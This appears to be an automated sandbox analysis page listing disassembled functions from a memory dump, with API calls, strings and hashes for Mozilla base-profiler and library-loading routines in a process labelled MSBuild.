Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C4A582D), ref: 6C4DCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C4A582D), ref: 6C4DCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C50FE98,?,?,?,?,?,6C4A582D), ref: 6C4DCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C4A582D), ref: 6C4DCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C4A582D), ref: 6C4DCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C4A582D), ref: 6C4DCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4A582D), ref: 6C4DCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C4DCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C4DCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C4DCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C4DCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C4DCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C4DCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C4DCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C4DCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C4DCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C4DCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C4DCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C4DCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C4DCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C4DCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C4DCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C4DCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C4DCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C4DCE8A

Strings

samplingallthreads, xrefs: 6C4DCE2C
default, xrefs: 6C4DCC21
nativeallocations, xrefs: 6C4DCDA8
power, xrefs: 6C4DCE84
Unrecognized feature "%s"., xrefs: 6C4DCEA0
mainthreadio, xrefs: 6C4DCC7C
audiocallbacktracing, xrefs: 6C4DCDD4
ipcmessages, xrefs: 6C4DCDBE
fileio, xrefs: 6C4DCC92
notimerresolutionchange, xrefs: 6C4DCE00
cpuallthreads, xrefs: 6C4DCE16
fileioall, xrefs: 6C4DCCA8
stackwalk, xrefs: 6C4DCCF8
noiostacks, xrefs: 6C4DCCBE
screenshots, xrefs: 6C4DCCD4
nostacksampling, xrefs: 6C4DCD7C
processcpu, xrefs: 6C4DCE6E
leaf, xrefs: 6C4DCC66
seqstyle, xrefs: 6C4DCCE6
preferencereads, xrefs: 6C4DCD92
java, xrefs: 6C4DCC37
jsallocations, xrefs: 6C4DCD0E
unregisteredthreads, xrefs: 6C4DCE58
markersallthreads, xrefs: 6C4DCE42

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: ba714bb3b6e03ee0df2a604249d66e54934d6fb06a4f1ef9e0cd954b9b5f184d
Instruction ID: b869225c05b1df1b50a3d5cc7efff4e19553b41d516a010fa34a24f5d550707e
Opcode Fuzzy Hash: ba714bb3b6e03ee0df2a604249d66e54934d6fb06a4f1ef9e0cd954b9b5f184d
Instruction Fuzzy Hash: 9051B8E1B5922562FE00B5196D30FEA5605EB9324BF21003EFD09E1FC0FB14B60A86B7

Function 6C4A47C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C4A4801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4A4817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4A482D
__Init_thread_footer.LIBCMT ref: 6C4A484A

Part of subcall function 6C4CAB3F: EnterCriticalSection.KERNEL32(6C51E370,?,?,6C493527,6C51F6CC,?,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB49
Part of subcall function 6C4CAB3F: LeaveCriticalSection.KERNEL32(6C51E370,?,6C493527,6C51F6CC,?,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CAB7C

GetCurrentThreadId.KERNEL32 ref: 6C4A485F
GetCurrentThreadId.KERNEL32 ref: 6C4A487E
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4A488B
free.MOZGLUE(?), ref: 6C4A493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4A4956
free.MOZGLUE(00000000), ref: 6C4A4960
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4A499A

Part of subcall function 6C4CAB89: EnterCriticalSection.KERNEL32(6C51E370,?,?,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB94
Part of subcall function 6C4CAB89: LeaveCriticalSection.KERNEL32(6C51E370,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CABD1

free.MOZGLUE(?), ref: 6C4A49C6
free.MOZGLUE(?), ref: 6C4A49E9

Part of subcall function 6C4B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4B5EDB
Part of subcall function 6C4B5E90: memset.VCRUNTIME140(ewOl,000000E5,?), ref: 6C4B5F27
Part of subcall function 6C4B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C4B5FB2

Strings

MOZ_PROFILER_SHUTDOWN, xrefs: 6C4A4A42
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C4A47FC
[I %d/%d] profiler_shutdown, xrefs: 6C4A4A06
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C4A4812
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C4A4828

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: 8b94293b81b6cae5e224c8f88f14df3eb0ac627133fa321a23fba1dde37213b8
Instruction ID: 88afde24472f4568503369a882c52c11dba879ac1820dc9ef5bea757bf2fdb40
Opcode Fuzzy Hash: 8b94293b81b6cae5e224c8f88f14df3eb0ac627133fa321a23fba1dde37213b8
Instruction Fuzzy Hash: 3B815A74A001008FEB00DFA8DC49F1E3775AF62359F152239E90697F49EB31E956CB9A

Function 6C4A4470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4A4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C4A44B2,6C51E21C,6C51F7F8), ref: 6C4A473E
Part of subcall function 6C4A4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C4A474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C4A44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C4A44D2
InitOnceExecuteOnce.KERNEL32(6C51F80C,6C49F240,?,?), ref: 6C4A451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C4A455C
LoadLibraryW.KERNEL32(?), ref: 6C4A4592
InitializeCriticalSection.KERNEL32(6C51F770), ref: 6C4A45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C4A45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C4A45BB
InitOnceExecuteOnce.KERNEL32(6C51F818,6C49F240,?,?), ref: 6C4A4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C4A4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C4A4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C4A466D
VerSetConditionMask.NTDLL ref: 6C4A469F
VerSetConditionMask.NTDLL ref: 6C4A46AB
VerSetConditionMask.NTDLL ref: 6C4A46B2
VerSetConditionMask.NTDLL ref: 6C4A46B9
VerSetConditionMask.NTDLL ref: 6C4A46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C4A46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C4A46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C4A46FD

Strings

NativeNtBlockSet_Write, xrefs: 6C4A46F7
l, xrefs: 6C4A4578
GQl, xrefs: 6C4A44FC
WRusr.dll, xrefs: 6C4A44B5
user32.dll, xrefs: 6C4A4557, 6C4A463F
kernel32.dll, xrefs: 6C4A44CD

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: GQl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-1211609278
Opcode ID: 0a0fc1cc8ee22fb7d3a4f7ce519b6f6ef71d2120c78abe6e4f4f52d7979f41a1
Instruction ID: bdd392cbb5b69e78d9ba1536d50593fdaa477af49e742fb0466599a27cd5be1d
Opcode Fuzzy Hash: 0a0fc1cc8ee22fb7d3a4f7ce519b6f6ef71d2120c78abe6e4f4f52d7979f41a1
Instruction Fuzzy Hash: F061F5B0A04244AFFB00DFA0CC4EF997BB8EB56348F059658E5049BF51DBB48986CF95

Function 6C4A19A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C51F760), ref: 6C4A19BD
GetCurrentProcess.KERNEL32 ref: 6C4A19E5
GetLastError.KERNEL32 ref: 6C4A1A27
moz_xmalloc.MOZGLUE(?), ref: 6C4A1A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C4A1A4F
GetLastError.KERNEL32 ref: 6C4A1A92
moz_xmalloc.MOZGLUE(?), ref: 6C4A1AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C4A1ABA
LocalFree.KERNEL32(?), ref: 6C4A1C69
free.MOZGLUE(?), ref: 6C4A1C8F
free.MOZGLUE(?), ref: 6C4A1C9D
CloseHandle.KERNEL32(?), ref: 6C4A1CAE
ReleaseSRWLockExclusive.KERNEL32(6C51F760), ref: 6C4A1D52
GetLastError.KERNEL32 ref: 6C4A1DA5
GetLastError.KERNEL32 ref: 6C4A1DFB
GetLastError.KERNEL32 ref: 6C4A1E49
GetLastError.KERNEL32 ref: 6C4A1E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4A1E9B

Part of subcall function 6C4A2070: LoadLibraryW.KERNEL32(combase.dll,6C4A1C5F), ref: 6C4A20AE
Part of subcall function 6C4A2070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C4A20CD
Part of subcall function 6C4A2070: __Init_thread_footer.LIBCMT ref: 6C4A20E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6C4A1F15
VerSetConditionMask.NTDLL ref: 6C4A1F46
VerSetConditionMask.NTDLL ref: 6C4A1F52
VerSetConditionMask.NTDLL ref: 6C4A1F59
VerSetConditionMask.NTDLL ref: 6C4A1F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C4A1F6D

Strings

D, xrefs: 6C4A1B57

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: 9696ae6dabfacc3e744532dc0ae53974407170ebfc8ce6440dce94affa4249b4
Instruction ID: 80e2e5902f9593dfa5dbff4cc412d4593b42c147f464628e50bc21eab17671b0
Opcode Fuzzy Hash: 9696ae6dabfacc3e744532dc0ae53974407170ebfc8ce6440dce94affa4249b4
Instruction Fuzzy Hash: 28F18FB1A00325EBEB20DF65CC49F9AB7B4FF59304F114199E905A7A40E774EE81CBA4

Function 6C4DE8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C4DB9F1,?), ref: 6C4D7107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C4DDCF5), ref: 6C4DE92D
GetCurrentThreadId.KERNEL32 ref: 6C4DEA4F
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DEA5C
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DEA80
GetCurrentThreadId.KERNEL32 ref: 6C4DEA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C4DDCF5), ref: 6C4DEA92
GetCurrentThreadId.KERNEL32 ref: 6C4DEB11
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C4DEB3C
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DEB5B

Part of subcall function 6C4D5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4DEB71), ref: 6C4D57AB

Part of subcall function 6C4CCBE8: GetCurrentProcess.KERNEL32(?,6C4931A7), ref: 6C4CCBF1
Part of subcall function 6C4CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4931A7), ref: 6C4CCBFA

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C4DEBAC

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

GetCurrentThreadId.KERNEL32 ref: 6C4DEBC1
AcquireSRWLockExclusive.KERNEL32(6C51F4B8,?,?,00000000), ref: 6C4DEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C4DEBE5
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8,00000000), ref: 6C4DEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C4DEC46
CloseHandle.KERNEL32(?), ref: 6C4DEC55
free.MOZGLUE(00000000), ref: 6C4DEC5C

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C4DEA9B
[I %d/%d] profiler_start, xrefs: 6C4DEBB4

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: a37bb2f52a01a5c4b83d0f0d1aa675bea433080547cd7600b6fb603a2c1ad6ae
Instruction ID: faa9af74a94a74278ec609fb8e948b1af753ed92a1c272027a8b537e86958fa5
Opcode Fuzzy Hash: a37bb2f52a01a5c4b83d0f0d1aa675bea433080547cd7600b6fb603a2c1ad6ae
Instruction Fuzzy Hash: DEA145757006009FDB00EF19CCA9F6ABBB5EF96308F12422DE91987F41DB71A805CBA5

Function 6C4DF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DF70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C4DF8F9

Part of subcall function 6C4A6390: GetCurrentThreadId.KERNEL32 ref: 6C4A63D0
Part of subcall function 6C4A6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C4A63DF
Part of subcall function 6C4A6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C4A640E

ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF93A
GetCurrentThreadId.KERNEL32 ref: 6C4DF98A
GetCurrentThreadId.KERNEL32 ref: 6C4DF990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DF994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DF716

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

Part of subcall function 6C49B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C49B5E0

GetCurrentThreadId.KERNEL32 ref: 6C4DF739
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF746
GetCurrentThreadId.KERNEL32 ref: 6C4DF793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C51385B,00000002,?,?,?,?,?), ref: 6C4DF829
free.MOZGLUE(?,?,00000000,?), ref: 6C4DF84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C4DF866
free.MOZGLUE(?), ref: 6C4DFA0C

Part of subcall function 6C4A5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4A55E1), ref: 6C4A5E8C
Part of subcall function 6C4A5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4A5E9D
Part of subcall function 6C4A5E60: GetCurrentThreadId.KERNEL32 ref: 6C4A5EAB
Part of subcall function 6C4A5E60: GetCurrentThreadId.KERNEL32 ref: 6C4A5EB8
Part of subcall function 6C4A5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4A5ECF
Part of subcall function 6C4A5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C4A5F27
Part of subcall function 6C4A5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C4A5F47
Part of subcall function 6C4A5E60: GetCurrentProcess.KERNEL32 ref: 6C4A5F53
Part of subcall function 6C4A5E60: GetCurrentThread.KERNEL32 ref: 6C4A5F5C
Part of subcall function 6C4A5E60: GetCurrentProcess.KERNEL32 ref: 6C4A5F66
Part of subcall function 6C4A5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C4A5F7E

free.MOZGLUE(?), ref: 6C4DF9C5
free.MOZGLUE(?), ref: 6C4DF9DA

Strings

Thread , xrefs: 6C4DF789
" attempted to re-register as ", xrefs: 6C4DF858
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C4DF9A6
[D %d/%d] profiler_register_thread(%s), xrefs: 6C4DF71F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: f6419284ad8de3d1562d2b1ffdc21e47178b69a51c6185bef6bd3108e3b7eb8d
Instruction ID: c1397241970599757ff61744b557a076a73f416cab54a3d6b4f3096514b01648
Opcode Fuzzy Hash: f6419284ad8de3d1562d2b1ffdc21e47178b69a51c6185bef6bd3108e3b7eb8d
Instruction Fuzzy Hash: E9811671A053009FE721EF24C854FAAB7B5EF85308F46455DE8499BB51EB30A849CBE2

Function 6C4A4180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C4A4196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C4A41F1
VerSetConditionMask.NTDLL ref: 6C4A4223
VerSetConditionMask.NTDLL ref: 6C4A422A
VerSetConditionMask.NTDLL ref: 6C4A4231
VerSetConditionMask.NTDLL ref: 6C4A4238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C4A4245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C4A4263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C4A427A
FreeLibrary.KERNEL32(?), ref: 6C4A4299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C4A42C4
VerSetConditionMask.NTDLL ref: 6C4A42F6
VerSetConditionMask.NTDLL ref: 6C4A4302
VerSetConditionMask.NTDLL ref: 6C4A4309
VerSetConditionMask.NTDLL ref: 6C4A4310
VerSetConditionMask.NTDLL ref: 6C4A4317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C4A4324

Strings

SetProcessDpiAwareness, xrefs: 6C4A4274
Shcore.dll, xrefs: 6C4A425E

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 15556ba56165be502afec7fe9e6211e22c209c759799c779b4e9c0f6ff616ba3
Instruction ID: 7137d3cbbdb1ebc028ef51adfe10eb44957937757f194e07cb1fcd1d395b8a8d
